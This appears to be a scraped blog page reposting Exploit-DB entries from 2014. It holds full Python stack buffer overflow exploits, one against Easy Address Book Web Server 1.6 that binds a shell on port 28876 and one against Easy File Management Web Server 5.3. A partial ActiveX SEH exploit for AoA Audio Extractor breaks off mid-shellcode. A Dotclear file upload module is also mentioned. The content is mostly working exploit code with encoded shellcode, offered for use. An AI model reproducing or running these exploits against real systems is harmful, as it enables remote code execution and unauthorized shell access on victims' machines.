Dotclear Media Manager Authenticated Arbitrary File Upload Exploit

This is a Metasploit modules that leverages an authenticated arbitrary file upload vulnerability in Dotclear versions 2.6.2 and below.<br>

Dotclear Media Manager Authenticated Arbitrary File Upload Exploit

This is a Metasploit modules that leverages an authenticated arbitrary file upload vulnerability in Dotclear versions 2.6.2 and below.

Read more »

Easy Address Book Web Server 1.6 - Stack Buffer Overflow

<div class="separator" style="clear: both; text-align: center;"> <a href="http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt33500/screenshot-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt33500/screenshot-1.png" width="320"></a></div> <div class="container"> <div class="line number1 index0 alt2"> <code class="py comments">#!/usr/bin/env python</code></div> <div class="line number2 index1 alt1">  </div> <div class="line number3 index2 alt2"> <code class="py comments"># Exploit Title: Easy Address Book Web Server 1.6 stack buffer overflow</code></div> <div class="line number4 index3 alt1"> <code class="py comments"># Date: 19 May 2014</code></div> <div class="line number5 index4 alt2"> <code class="py comments"># Exploit Author: superkojiman - http://www.techorganic.com</code></div> <div class="line number6 index5 alt1"> <code class="py comments"># Vendor Homepage: http://www.efssoft.com/web-address-book-server.html</code></div> <div class="line number7 index6 alt2"> <code class="py comments"># Software Link: http://www.efssoft.com/eabws.exe</code></div> <div class="line number8 index7 alt1"> <code class="py comments"># Version: 1.6</code></div> <div class="line number9 index8 alt2"> <code class="py comments"># Tested on: English version of Windows XP Professional SP2 and SP3</code></div> <div class="line number10 index9 alt1"> <code class="py comments">#</code></div> <div class="line number11 index10 alt2"> <code class="py comments"># Description: </code></div> <div class="line number12 index11 alt1"> <code class="py comments"># By setting UserID in the cookie to a long string, we can overwrite EDX which </code></div> <div class="line number13 index12 alt2"> <code class="py comments"># allows us to control execution flow when "call dword ptr [edx+28h]" is </code></div> <div class="line number14 index13 alt1"> <code class="py comments"># executed. EDX is overwritten with an address pointing to a location on the </code></div> <div class="line number15 index14 alt2"> <code class="py comments"># stack which in turn points to a NOP sled leading to the shellcode. This </code></div> <div class="line number16 index15 alt1"> <code class="py comments"># address on the stack is brute forced, but doesn't take long since only the </code></div> <div class="line number17 index16 alt2"> <code class="py comments"># 2nd byte is always different, so the address is always 0x01??B494.  </code></div> <div class="line number18 index17 alt1"> <code class="py comments"># </code></div> <div class="line number19 index18 alt2"> <code class="py comments"># It's similar to Easy File Sharing Web Server 6.8 exploit here. </code></div> <div class="line number20 index19 alt1"> <code class="py comments"># http://www.exploit-db.com/exploits/33352/ I suspect same code reused for </code></div> <div class="line number21 index20 alt2"> <code class="py comments"># their Web Server series of applications. </code></div> <div class="line number22 index21 alt1"> <code class="py comments">#</code></div> <div class="line number23 index22 alt2"> <code class="py comments"># Tested with Easy Address Book Web Server installed in the default location </code></div> <div class="line number24 index23 alt1"> <code class="py comments"># at C:\EFS Software\Easy Address Book Web Server</code></div> <div class="line number25 index24 alt2"> <code class="py comments">#</code></div> <div class="line number26 index25 alt1"> <code class="py comments"># The exploit can sometimes fail the first time, so try a few more times and </code></div> <div class="line number27 index26 alt2"> <code class="py comments"># you might get a shell. </code></div> <div class="line number28 index27 alt1">  </div> <div class="line number29 index28 alt2"> <code class="py keyword">import</code> <code class="py plain">socket</code></div> <div class="line number30 index29 alt1"> <code class="py keyword">import</code> <code class="py plain">struct</code></div> <div class="line number31 index30 alt2"> <code class="py keyword">import</code> <code class="py plain">sys</code></div> <div class="line number32 index31 alt1">  </div> <div class="line number33 index32 alt2"> <code class="py plain">target </code><code class="py keyword">=</code> <code class="py string">"172.16.229.134"</code></div> <div class="line number34 index33 alt1"> <code class="py plain">port </code><code class="py keyword">=</code> <code class="py value">80</code></div> <div class="line number35 index34 alt2">  </div> <div class="line number36 index35 alt1">  </div> <div class="line number37 index36 alt2"> <code class="py comments"># Shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/</code></div> <div class="line number38 index37 alt1"> <code class="py comments"># Binds a shell on port 28876</code></div> <div class="line number39 index38 alt2"> <code class="py comments"># msfencode -b '\x00\x20' -i w32-bind-ngs-shellcode.bin </code></div> <div class="line number40 index39 alt1"> <code class="py comments"># [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1)</code></div> <div class="line number41 index40 alt2"> <code class="py plain">shellcode </code><code class="py keyword">=</code> <code class="py plain">(</code></div> <div class="line number42 index41 alt1"> <code class="py string">"\xbb\xa1\x68\xde\x7c\xdd\xc0\xd9\x74\x24\xf4\x58\x33\xc9"</code> <code class="py keyword">+</code></div> <div class="line number43 index42 alt2"> <code class="py string">"\xb1\x36\x31\x58\x14\x83\xe8\xfc\x03\x58\x10\x43\x9d\xef"</code> <code class="py keyword">+</code></div> <div class="line number44 index43 alt1"> <code class="py string">"\xb5\xe7\xd5\x61\x76\x6c\x9f\x8d\xfd\x04\x7c\x05\x6f\xe0"</code> <code class="py keyword">+</code></div> <div class="line number45 index44 alt2"> <code class="py string">"\xf7\x67\x50\x7b\x31\xa0\xdf\x63\x4b\x23\x8e\xfb\x81\x9c"</code> <code class="py keyword">+</code></div> <div class="line number46 index45 alt1"> <code class="py string">"\x02\xc9\x8d\x44\x33\x5a\x3d\xe1\x0c\x2b\xc8\x69\xfb\xd5"</code> <code class="py keyword">+</code></div> <div class="line number47 index46 alt2"> <code class="py string">"\x7e\x8a\xd5\xd5\xa8\x41\xac\x02\x7c\xaa\x05\x8d\xd0\x0c"</code> <code class="py keyword">+</code></div> <div class="line number48 index47 alt1"> <code class="py string">"\x0b\x5a\x82\x0d\x44\x48\x80\x5d\x10\xcd\xf4\xea\x7a\xf0"</code> <code class="py keyword">+</code></div> <div class="line number49 index48 alt2"> <code class="py string">"\x7c\xec\x69\x81\x36\xce\x6c\x7c\x9e\x3f\xbd\x3c\x94\x74"</code> <code class="py keyword">+</code></div> <div class="line number50 index49 alt1"> <code class="py string">"\xd0\xc1\x44\xc0\xe4\x6d\xac\x58\x21\xa9\xf1\xeb\x44\xc6"</code> <code class="py keyword">+</code></div> <div class="line number51 index50 alt2"> <code class="py string">"\x30\x2b\xd2\xc3\x1b\xb8\x57\x37\xa5\x57\x68\x80\xb1\xf6"</code> <code class="py keyword">+</code></div> <div class="line number52 index51 alt1"> <code class="py string">"\xfc\xa5\xa5\xf9\xeb\xb0\x3e\xfa\xef\x53\x15\x7d\xd1\x5a"</code> <code class="py keyword">+</code></div> <div class="line number53 index52 alt2"> <code class="py string">"\x1f\x76\xa3\x02\xdb\xd5\x44\x6a\xb4\x4c\x3a\xb4\x48\x1a"</code> <code class="py keyword">+</code></div> <div class="line number54 index53 alt1"> <code class="py string">"\x8a\x96\x03\x1b\x3c\x8b\xa3\x34\x28\x52\x74\x4b\xac\xdb"</code> <code class="py keyword">+</code></div> <div class="line number55 index54 alt2"> <code class="py string">"\xb8\xd9\x43\xb4\x13\x48\x9b\xea\xe9\xb3\x17\xf2\xc3\xe1"</code> <code class="py keyword">+</code></div> <div class="line number56 index55 alt1"> <code class="py string">"\x8a\x6a\x47\x6b\x4f\x4a\x0a\x0f\xab\xb2\xbf\x5b\x18\x04"</code> <code class="py keyword">+</code></div> <div class="line number57 index56 alt2"> <code class="py string">"\xf8\x72\x5e\xdc\x80\xb9\x45\x8b\xdc\x93\xd7\xf5\xa6\xfc"</code> <code class="py keyword">+</code></div> <div class="line number58 index57 alt1"> <code class="py string">"\xd0\xae\x7a\x51\xb6\x02\x84\x03\xdc\x29\x3c\x50\xf5\xe7"</code> <code class="py keyword">+</code></div> <div class="line number59 index58 alt2"> <code class="py string">"\x3e\x57\xf9"</code></div> <div class="line number60 index59 alt1"> <code class="py plain">)</code></div> <div class="line number61 index60 alt2">  </div> <div class="line number62 index61 alt1"> <code class="py keyword">for</code> <code class="py plain">i </code><code class="py keyword">in</code> <code class="py functions">xrange</code><code class="py plain">(</code><code class="py value">1</code><code class="py plain">,</code><code class="py value">255</code><code class="py plain">):</code></div> <div class="line number63 index62 alt2"> <code class="py spaces">    </code><code class="py plain">n </code><code class="py keyword">=</code> <code class="py plain">""</code></div> <div class="line number64 index63 alt1"> <code class="py spaces">    </code><code class="py keyword">if</code> <code class="py plain">i < </code><code class="py value">16</code><code class="py plain">:</code></div> <div class="line number65 index64 alt2"> <code class="py spaces">        </code><code class="py plain">n </code><code class="py keyword">=</code> <code class="py string">"0"</code> <code class="py keyword">+</code> <code class="py functions">hex</code><code class="py plain">(i)[</code><code class="py keyword">-</code><code class="py value">1</code><code class="py plain">]</code></div> <div class="line number66 index65 alt1"> <code class="py spaces">    </code><code class="py keyword">else</code><code class="py plain">:</code></div> <div class="line number67 index66 alt2"> <code class="py spaces">        </code><code class="py plain">n </code><code class="py keyword">=</code> <code class="py functions">hex</code><code class="py plain">(i)[</code><code class="py value">2</code><code class="py plain">:]</code></div> <div class="line number68 index67 alt1"> <code class="py spaces"> </code> </div> <div class="line number69 index68 alt2"> <code class="py spaces">    </code><code class="py plain">guess </code><code class="py keyword">=</code> <code class="py string">"0x01"</code> <code class="py keyword">+</code> <code class="py plain">n </code><code class="py keyword">+</code> <code class="py string">"b494"</code>     <code class="py comments"># value of edx used in </code></div> <div class="line number70 index69 alt1"> <code class="py spaces">                                    </code><code class="py comments"># "call dword ptr ds:[edx+28]</code></div> <div class="line number71 index70 alt2"> <code class="py spaces">                                    </code><code class="py comments"># only 2nd byte changes in stack address</code></div> <div class="line number72 index71 alt1">  </div> <div class="line number73 index72 alt2"> <code class="py spaces">    </code><code class="py plain">nops </code><code class="py keyword">=</code> <code class="py functions">int</code><code class="py plain">(guess, </code><code class="py value">16</code><code class="py plain">) </code><code class="py keyword">+</code> <code class="py value">129</code>     <code class="py comments"># addres sof nop sled is guess+129 bytes</code></div> <div class="line number74 index73 alt1">  </div> <div class="line number75 index74 alt2"> <code class="py spaces">    </code><code class="py functions">print</code> <code class="py string">"[+] Trying guess at"</code><code class="py plain">, guess</code></div> <div class="line number76 index75 alt1">  </div> <div class="line number77 index76 alt2"> <code class="py spaces">    </code><code class="py plain">payload </code><code class="py keyword">=</code>  <code class="py plain">struct.pack(</code><code class="py string">"<I"</code><code class="py plain">, nops)          </code><code class="py comments"># pointer to nop sled</code></div> <div class="line number78 index77 alt1"> <code class="py spaces">    </code><code class="py plain">payload </code><code class="py keyword">+</code><code class="py keyword">=</code> <code class="py string">"A"</code><code class="py keyword">*</code><code class="py value">76</code>                           <code class="py comments"># padding</code></div> <div class="line number79 index78 alt2"> <code class="py spaces">    </code><code class="py plain">payload </code><code class="py keyword">+</code><code class="py keyword">=</code> <code class="py plain">struct.pack(</code><code class="py string">"<I"</code><code class="py plain">, </code><code class="py functions">int</code><code class="py plain">(guess,</code><code class="py value">16</code><code class="py plain">)) </code><code class="py comments"># address containing pointer to </code></div> <div class="line number80 index79 alt1"> <code class="py spaces">                                                </code><code class="py comments"># nop sled</code></div> <div class="line number81 index80 alt2">  </div> <div class="line number82 index81 alt1"> <code class="py spaces">    </code><code class="py plain">payload </code><code class="py keyword">+</code><code class="py keyword">=</code> <code class="py string">"\x90"</code><code class="py keyword">*</code><code class="py value">20</code>                        <code class="py comments"># nop sled</code></div> <div class="line number83 index82 alt2"> <code class="py spaces">    </code><code class="py plain">payload </code><code class="py keyword">+</code><code class="py keyword">=</code> <code class="py plain">shellcode                        </code><code class="py comments"># win!</code></div> <div class="line number84 index83 alt1"> <code class="py spaces">                </code> </div> <div class="line number85 index84 alt2"> <code class="py spaces">    </code><code class="py comments"># craft the request</code></div> <div class="line number86 index85 alt1"> <code class="py spaces">    </code><code class="py plain">buf </code><code class="py keyword">=</code> <code class="py plain">(</code></div> <div class="line number87 index86 alt2"> <code class="py spaces">    </code><code class="py string">"GET /addrbook.ghp HTTP/1.1\r\n"</code></div> <div class="line number88 index87 alt1"> <code class="py spaces">    </code><code class="py string">"User-Agent: Mozilla/4.0\r\n"</code></div> <div class="line number89 index88 alt2"> <code class="py spaces">    </code><code class="py string">"Host:"</code> <code class="py keyword">+</code> <code class="py plain">target </code><code class="py keyword">+</code> <code class="py string">":"</code> <code class="py keyword">+</code> <code class="py functions">str</code><code class="py plain">(port) </code><code class="py keyword">+</code> <code class="py string">"\r\n"</code></div> <div class="line number90 index89 alt1"> <code class="py spaces">    </code><code class="py string">"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"</code></div> <div class="line number91 index90 alt2"> <code class="py spaces">    </code><code class="py string">"Accept-Language: en-us\r\n"</code></div> <div class="line number92 index91 alt1"> <code class="py spaces">    </code><code class="py string">"Accept-Encoding: gzip, deflate\r\n"</code></div> <div class="line number93 index92 alt2"> <code class="py spaces">    </code><code class="py string">"Referer: http://"</code> <code class="py keyword">+</code> <code class="py plain">target </code><code class="py keyword">+</code> <code class="py string">"/\r\n"</code></div> <div class="line number94 index93 alt1"> <code class="py spaces">    </code><code class="py string">"Cookie: SESSIONID=6771; UserID="</code> <code class="py keyword">+</code> <code class="py plain">payload </code><code class="py keyword">+</code> <code class="py string">"; PassWD=;\r\n"</code></div> <div class="line number95 index94 alt2"> <code class="py spaces">    </code><code class="py string">"Conection: Keep-Alive\r\n\r\n"</code></div> <div class="line number96 index95 alt1"> <code class="py spaces">    </code><code class="py plain">)</code></div> <div class="line number97 index96 alt2">  </div> <div class="line number98 index97 alt1"> <code class="py spaces">    </code><code class="py keyword">try</code><code class="py plain">:</code></div> <div class="line number99 index98 alt2"> <code class="py spaces">        </code><code class="py comments"># send the request and payload to the server</code></div> <div class="line number100 index99 alt1"> <code class="py spaces">        </code><code class="py plain">s1 </code><code class="py keyword">=</code> <code class="py plain">socket.socket(socket.AF_INET, socket.SOCK_STREAM)</code></div> <div class="line number101 index100 alt2"> <code class="py spaces">        </code><code class="py plain">s1.connect((target, port))</code></div> <div class="line number102 index101 alt1"> <code class="py spaces">        </code><code class="py plain">s1.send(buf)</code></div> <div class="line number103 index102 alt2"> <code class="py spaces">        </code><code class="py plain">s1.close()</code></div> <div class="line number104 index103 alt1"> <code class="py spaces">    </code><code class="py keyword">except</code> <code class="py plain">Exception,e: </code></div> <div class="line number105 index104 alt2"> <code class="py spaces">        </code><code class="py keyword">pass</code></div> <div class="line number106 index105 alt1"> <code class="py spaces">    </code> </div> <div class="line number107 index106 alt2"> <code class="py spaces">    </code><code class="py keyword">try</code><code class="py plain">:</code></div> <div class="line number108 index107 alt1"> <code class="py spaces">        </code><code class="py comments"># check if we guessed the correct address by connecting to port 28876</code></div> <div class="line number109 index108 alt2"> <code class="py spaces">        </code><code class="py plain">s2 </code><code class="py keyword">=</code> <code class="py plain">socket.socket(socket.AF_INET, socket.SOCK_STREAM)</code></div> <div class="line number110 index109 alt1"> <code class="py spaces">        </code><code class="py plain">s2.connect((target, </code><code class="py value">28876</code><code class="py plain">))</code></div> <div class="line number111 index110 alt2"> <code class="py spaces">        </code><code class="py plain">s2.close()</code></div> <div class="line number112 index111 alt1"> <code class="py spaces">        </code><code class="py functions">print</code> <code class="py string">"\n[+] Success! A shell is waiting on port 28876!"</code></div> <div class="line number113 index112 alt2"> <code class="py spaces">        </code><code class="py plain">sys.exit(</code><code class="py value">0</code><code class="py plain">)</code></div> <div class="line number114 index113 alt1"> <code class="py spaces">    </code><code class="py keyword">except</code> <code class="py plain">Exception,e:</code></div> <div class="line number115 index114 alt2"> <code class="py spaces">        </code><code class="py keyword">pass</code></div> <div class="line number116 index115 alt1">  </div> <div class="line number117 index116 alt2"> <code class="py functions">print</code> <code class="py string">"\n[!] Didn't work. Sometimes it takes a few tries, so try again."</code></div> </div> <br>

Easy Address Book Web Server 1.6 - Stack Buffer Overflow

#!/usr/bin/env python   # Exploit Title: Easy Address Book Web Server 1.6 stack buffer overflow # Date: 19 May 2014 # Exploit Au...

Read more »

Easy File Management Web Server 5.3 - Stack Buffer Overflow

<div class="separator" style="clear: both; text-align: center;"> <a href="http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt33500/screenshot.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="233" src="http://www.exploit-db.com/wp-content/themes/exploit/screenshots/idlt33500/screenshot.png" width="320" /></a></div> <div class="noibat"> <div class="container"> <div class="line number1 index0 alt2"> <code class="py comments">#!/usr/bin/env python</code></div> <div class="line number2 index1 alt1">  </div> <div class="line number3 index2 alt2"> <code class="py comments"># Exploit Title: Easy File Management Web Server 5.3 stack buffer overflow</code></div> <div class="line number4 index3 alt1"> <code class="py comments"># Date: 19 May 2014</code></div> <div class="line number5 index4 alt2"> <code class="py comments"># Exploit Author: superkojiman - http://www.techorganic.com</code></div> <div class="line number6 index5 alt1"> <code class="py comments"># Vendor Homepage: http://www.efssoft.com</code></div> <div class="line number7 index6 alt2"> <code class="py comments"># Software Link: http://www.web-file-management.com/download.php</code></div> <div class="line number8 index7 alt1"> <code class="py comments"># Version: 5.3</code></div> <div class="line number9 index8 alt2"> <code class="py comments"># Tested on: English version of Windows XP Professional SP2 and SP3</code></div> <div class="line number10 index9 alt1"> <code class="py comments">#</code></div> <div class="line number11 index10 alt2"> <code class="py comments"># Description: </code></div> <div class="line number12 index11 alt1"> <code class="py comments"># By setting UserID in the cookie to a long string, we can overwrite EDX which </code></div> <div class="line number13 index12 alt2"> <code class="py comments"># allows us to control execution flow when the following instruction is </code></div> <div class="line number14 index13 alt1"> <code class="py comments"># executed:</code></div> <div class="line number15 index14 alt2"> <code class="py comments">#</code></div> <div class="line number16 index15 alt1"> <code class="py comments"># 0x00468702: call dword ptr [edx+28h]</code></div> <div class="line number17 index16 alt2"> <code class="py comments"># </code></div> <div class="line number18 index17 alt1"> <code class="py comments"># Very similar to Easy File Sharing Web Server 6.8 exploit here: </code></div> <div class="line number19 index18 alt2"> <code class="py comments"># http://www.exploit-db.com/exploits/33352/</code></div> <div class="line number20 index19 alt1"> <code class="py comments"># I suspect their other web server solutions might be vulnerable to a similar </code></div> <div class="line number21 index20 alt2"> <code class="py comments"># overflow.</code></div> <div class="line number22 index21 alt1"> <code class="py comments">#</code></div> <div class="line number23 index22 alt2"> <code class="py comments"># Tested with Easy File Management Web Server installed in the default location </code></div> <div class="line number24 index23 alt1"> <code class="py comments"># at C:\EFS Software\Easy File Management Web Server</code></div> <div class="line number25 index24 alt2">  </div> <div class="line number26 index25 alt1">  </div> <div class="line number27 index26 alt2"> <code class="py keyword">import</code> <code class="py plain">socket</code></div> <div class="line number28 index27 alt1"> <code class="py keyword">import</code> <code class="py plain">struct</code></div> <div class="line number29 index28 alt2"> <code class="py keyword">import</code> <code class="py plain">sys</code></div> <div class="line number30 index29 alt1">  </div> <div class="line number31 index30 alt2"> <code class="py plain">target </code><code class="py keyword">=</code> <code class="py string">"172.16.229.134"</code></div> <div class="line number32 index31 alt1"> <code class="py plain">port </code><code class="py keyword">=</code> <code class="py value">80</code></div> <div class="line number33 index32 alt2">  </div> <div class="line number34 index33 alt1"> <code class="py comments"># calc shellcode from https://code.google.com/p/win-exec-calc-shellcode/</code></div> <div class="line number35 index34 alt2"> <code class="py comments"># msfencode -b "\x00\x20" -i w32-exec-calc-shellcode.bin </code></div> <div class="line number36 index35 alt1"> <code class="py comments"># [*] x86/shikata_ga_nai succeeded with size 101 (iteration=1)</code></div> <div class="line number37 index36 alt2"> <code class="py plain">shellcode </code><code class="py keyword">=</code> <code class="py plain">( </code></div> <div class="line number38 index37 alt1"> <code class="py string">"\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"</code> <code class="py keyword">+</code></div> <div class="line number39 index38 alt2"> <code class="py string">"\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"</code> <code class="py keyword">+</code></div> <div class="line number40 index39 alt1"> <code class="py string">"\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"</code> <code class="py keyword">+</code></div> <div class="line number41 index40 alt2"> <code class="py string">"\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"</code> <code class="py keyword">+</code></div> <div class="line number42 index41 alt1"> <code class="py string">"\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"</code> <code class="py keyword">+</code></div> <div class="line number43 index42 alt2"> <code class="py string">"\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"</code> <code class="py keyword">+</code></div> <div class="line number44 index43 alt1"> <code class="py string">"\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"</code> <code class="py keyword">+</code></div> <div class="line number45 index44 alt2"> <code class="py string">"\x1c\x39\xbd"</code></div> <div class="line number46 index45 alt1"> <code class="py plain">)</code></div> <div class="line number47 index46 alt2">  </div> <div class="line number48 index47 alt1"> <code class="py keyword">for</code> <code class="py plain">i </code><code class="py keyword">in</code> <code class="py functions">xrange</code><code class="py plain">(</code><code class="py value">1</code><code class="py plain">,</code><code class="py value">255</code><code class="py plain">):</code></div> <div class="line number49 index48 alt2"> <code class="py spaces">    </code><code class="py plain">n </code><code class="py keyword">=</code> <code class="py plain">""</code></div> <div class="line number50 index49 alt1"> <code class="py spaces">    </code><code class="py keyword">if</code> <code class="py plain">i < </code><code class="py value">16</code><code class="py plain">:</code></div> <div class="line number51 index50 alt2"> <code class="py spaces">        </code><code class="py plain">n </code><code class="py keyword">=</code> <code class="py string">"0"</code> <code class="py keyword">+</code> <code class="py functions">hex</code><code class="py plain">(i)[</code><code class="py keyword">-</code><code class="py value">1</code><code class="py plain">]</code></div> <div class="line number52 index51 alt1"> <code class="py spaces">    </code><code class="py keyword">else</code><code class="py plain">:</code></div> <div class="line number53 index52 alt2"> <code class="py spaces">        </code><code class="py plain">n </code><code class="py keyword">=</code> <code class="py functions">hex</code><code class="py plain">(i)[</code><code class="py value">2</code><code class="py plain">:]</code></div> <div class="line number54 index53 alt1">  </div> <div class="line number55 index54 alt2"> <code class="py spaces">    </code><code class="py comments"># craft the value of EDX that will be used in CALL DWORD PTR DS:[EDX+28]</code></div> <div class="line number56 index55 alt1"> <code class="py spaces">    </code><code class="py comments"># only second byte changes in the stack address changes, so we can brute </code></div> <div class="line number57 index56 alt2"> <code class="py spaces">    </code><code class="py comments"># force it</code></div> <div class="line number58 index57 alt1"> <code class="py spaces">    </code><code class="py plain">guess </code><code class="py keyword">=</code> <code class="py string">"0x01"</code> <code class="py keyword">+</code> <code class="py plain">n </code><code class="py keyword">+</code> <code class="py string">"9898"</code></div> <div class="line number59 index58 alt2"> <code class="py spaces">    </code><code class="py functions">print</code> <code class="py string">"trying"</code><code class="py plain">, guess</code></div> <div class="line number60 index59 alt1">  </div> <div class="line number61 index60 alt2"> <code class="py spaces">    </code><code class="py plain">payload </code><code class="py keyword">=</code>  <code class="py string">"A"</code><code class="py keyword">*</code><code class="py value">20</code>                               <code class="py comments"># padding</code></div> <div class="line number62 index61 alt1"> <code class="py spaces">    </code><code class="py plain">payload </code><code class="py keyword">+</code><code class="py keyword">=</code> <code class="py plain">struct.pack(</code><code class="py string">"<I"</code><code class="py plain">, </code><code class="py value">0x1001646a</code><code class="py plain">)        </code><code class="py comments"># call edi @LoadImage.dll</code></div> <div class="line number63 index62 alt2"> <code class="py spaces">    </code><code class="py plain">payload </code><code class="py keyword">+</code><code class="py keyword">=</code> <code class="py string">"B"</code><code class="py keyword">*</code><code class="py value">56</code>                               <code class="py comments"># padding</code></div> <div class="line number64 index63 alt1"> <code class="py spaces">    </code><code class="py plain">payload </code><code class="py keyword">+</code><code class="py keyword">=</code> <code class="py plain">struct.pack(</code><code class="py string">"<I"</code><code class="py plain">, </code><code class="py functions">int</code><code class="py plain">(guess, </code><code class="py value">16</code><code class="py plain">))    </code><code class="py comments"># guessed address in stack</code></div> <div class="line number65 index64 alt2"> <code class="py spaces">                                                    </code><code class="py comments"># containing pointer to </code></div> <div class="line number66 index65 alt1"> <code class="py spaces">                                                    </code><code class="py comments"># call edi</code></div> <div class="line number67 index66 alt2">  </div> <div class="line number68 index67 alt1"> <code class="py spaces">    </code><code class="py plain">payload </code><code class="py keyword">+</code><code class="py keyword">=</code> <code class="py string">"\x90"</code><code class="py keyword">*</code><code class="py value">20</code>                            <code class="py comments"># nop sled </code></div> <div class="line number69 index68 alt2"> <code class="py spaces">    </code><code class="py plain">payload </code><code class="py keyword">+</code><code class="py keyword">=</code> <code class="py plain">shellcode                            </code><code class="py comments"># win!</code></div> <div class="line number70 index69 alt1">  </div> <div class="line number71 index70 alt2"> <code class="py spaces">    </code><code class="py comments"># craft the request</code></div> <div class="line number72 index71 alt1"> <code class="py spaces">    </code><code class="py plain">buf </code><code class="py keyword">=</code> <code class="py plain">(</code></div> <div class="line number73 index72 alt2"> <code class="py spaces">    </code><code class="py string">"GET /vfolder.ghp HTTP/1.1\r\n"</code></div> <div class="line number74 index73 alt1"> <code class="py spaces">    </code><code class="py string">"User-Agent: Mozilla/4.0\r\n"</code></div> <div class="line number75 index74 alt2"> <code class="py spaces">    </code><code class="py string">"Host:"</code> <code class="py keyword">+</code> <code class="py plain">target </code><code class="py keyword">+</code> <code class="py string">":"</code> <code class="py keyword">+</code> <code class="py functions">str</code><code class="py plain">(port) </code><code class="py keyword">+</code> <code class="py string">"\r\n"</code></div> <div class="line number76 index75 alt1"> <code class="py spaces">    </code><code class="py string">"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"</code></div> <div class="line number77 index76 alt2"> <code class="py spaces">    </code><code class="py string">"Accept-Language: en-us\r\n"</code></div> <div class="line number78 index77 alt1"> <code class="py spaces">    </code><code class="py string">"Accept-Encoding: gzip, deflate\r\n"</code></div> <div class="line number79 index78 alt2"> <code class="py spaces">    </code><code class="py string">"Referer: http://"</code> <code class="py keyword">+</code> <code class="py plain">target </code><code class="py keyword">+</code> <code class="py string">"/\r\n"</code></div> <div class="line number80 index79 alt1"> <code class="py spaces">    </code><code class="py string">"Cookie: SESSIONID=6771; UserID="</code> <code class="py keyword">+</code> <code class="py plain">payload </code><code class="py keyword">+</code> <code class="py string">"; PassWD=;\r\n"</code></div> <div class="line number81 index80 alt2"> <code class="py spaces">    </code><code class="py string">"Conection: Keep-Alive\r\n\r\n"</code></div> <div class="line number82 index81 alt1"> <code class="py spaces">    </code><code class="py plain">)</code></div> <div class="line number83 index82 alt2">  </div> <div class="line number84 index83 alt1"> <code class="py spaces">    </code><code class="py comments"># send the request and payload to the server</code></div> <div class="line number85 index84 alt2"> <code class="py spaces">    </code><code class="py plain">s1 </code><code class="py keyword">=</code> <code class="py plain">socket.socket(socket.AF_INET, socket.SOCK_STREAM)</code></div> <div class="line number86 index85 alt1"> <code class="py spaces">    </code><code class="py plain">s1.connect((target, port))</code></div> <div class="line number87 index86 alt2"> <code class="py spaces">    </code><code class="py plain">s1.send(buf)</code></div> <div class="line number88 index87 alt1"> <code class="py spaces">    </code><code class="py plain">s1.close()</code></div> </div> </div>

Easy File Management Web Server 5.3 - Stack Buffer Overflow

#!/usr/bin/env python   # Exploit Title: Easy File Management Web Server 5.3 stack buffer overflow # Date: 19 May 2014 # Exploi...

Read more »

AoA Audio Extractor Basic 2.3.7 - ActiveX Exploit

<div class="container"> <div class="line number1 index0 alt2"> <code class="xml comments"><!--</code></div> <div class="line number2 index1 alt1"> <code class="xml comments"># Exploit Title: AoA Audio Extractor Basic ActiveX</code></div> <div class="line number3 index2 alt2"> <code class="xml comments"># Date: 19.05.2014</code></div> <div class="line number4 index3 alt1"> <code class="xml comments"># Author: metacom</code></div> <div class="line number5 index4 alt2"> <code class="xml comments"># Website: www.rstforums.com</code></div> <div class="line number6 index5 alt1"> <code class="xml comments"># Software Link: www.aoamedia.com/audioextractor.exe</code></div> <div class="line number7 index6 alt2"> <code class="xml comments"># Version: 2.3.7</code></div> <div class="line number8 index7 alt1"> <code class="xml comments"># Tested on: Windows xp sp3EN  IE 6.0</code></div> <div class="line number9 index8 alt2"> <code class="xml comments">--></code></div> <div class="line number10 index9 alt1"> <code class="xml plain"><</code><code class="xml keyword">html</code><code class="xml plain">></code></div> <div class="line number11 index10 alt2"> <code class="xml plain"><</code><code class="xml keyword">object</code> <code class="xml color1">classid</code><code class="xml plain">=</code><code class="xml string">'clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5'</code> <code class="xml color1">id</code><code class="xml plain">=</code><code class="xml string">'target'</code> <code class="xml plain">/></</code><code class="xml keyword">object</code><code class="xml plain">></code></div> <div class="line number12 index11 alt1"> <code class="xml plain"><</code><code class="xml keyword">script</code> <code class="xml color1">language</code><code class="xml plain">=</code><code class="xml string">'javascript'</code><code class="xml plain">></code></div> <div class="line number13 index12 alt2"> <code class="xml plain">nse="\xEB\x06\xff\xff";</code></div> <div class="line number14 index13 alt1"> <code class="xml plain">seh="\x58\xE4\x04\x10";</code></div> <div class="line number15 index14 alt2"> <code class="xml plain">nops="\x90";</code></div> <div class="line number16 index15 alt1"> <code class="xml plain">while (nops.length<</code><code class="xml keyword">10</code><code class="xml plain">){ nops+="\x90";}</code></div> <div class="line number17 index16 alt2"> <code class="xml plain">shellcode =(</code></div> <div class="line number18 index17 alt1"> <code class="xml plain">"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+</code></div> <div class="line number19 index18 alt2"> <code class="xml plain">"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+</code></div> <div class="line number20 index19 alt1"> <code class="xml plain">"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+</code></div> <div class="line number21 index20 alt2"> <code class="xml 